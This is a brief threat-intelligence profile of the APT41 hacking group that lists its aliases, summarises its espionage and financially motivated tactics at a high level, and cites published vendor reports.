What Are the Aliases of the APT41 Group?
APT41 is also known as: Wicked Panda, Brass Typhoon, BARIUM, Amoeba, BRONZE ATLAS, BRONZE EXPORT, Blackfly, Double Dragon, Earth Baku, G0044, G0096, Grayfly, HOODOO, LEAD, Leopard Typhoon, Red Kelpie, TA415, TG-2633, WICKED SPIDER, Winnti, Pigfish.
Key Takeaways
- APT41 operates with a dual mission of espionage and financially motivated crime, showing long‑term persistence across diverse global sectors.
- The group is highly agile in weaponizing new vulnerabilities, frequently exploiting both n‑day and zero‑day flaws in widely used enterprise software.
- Their operations rely heavily on living off the land techniques, multi‑stage payload delivery, and covert persistence methods to remain undetected.
- APT41 conducts comprehensive credential theft and internal discovery to expand control across networks, often extracting entire authentication databases.
- Defense evasion is achieved through obfuscation, file manipulation, service masquerading, and stealthy data exfiltration to legitimate cloud services.
- The group uses both web‑based and DNS‑based command and control channels, along with proxies and encrypted payloads, to maintain resilient communication paths.
- Since 2023, APT41 has continued sustained intrusions in critical industries worldwide, demonstrating consistent operational maturity.
References
[1] “APT41 Chinese Cyber Threat Group,” Google Cloud Blog. Accessed: Nov. 11, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/apt41-dual-espionage-and-cyber-crime-operation
[2] Accessed: Nov. 11, 2025. [Online]. Available: https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf
[3] “APT41 Initiates Intrusion Campaign Using Multiple Exploits,” Google Cloud Blog. Accessed: Nov. 11, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/apt41-initiates-global-intrusion-campaign-using-multiple-exploits/
[4] “APT41 Targeting U.S. State Government Networks,” Google Cloud Blog. Accessed: Nov. 11, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/apt41-us-state-governments
[5] “APT41 Has Arisen From the DUST,” Google Cloud Blog. Accessed: Nov. 11, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust
[6] Group-IB, “APT41 World Tour 2021 on a tight schedule.” Accessed: Nov. 14, 2025. [Online]. Available: https://www.group-ib.com/blog/apt41-world-tour-2021/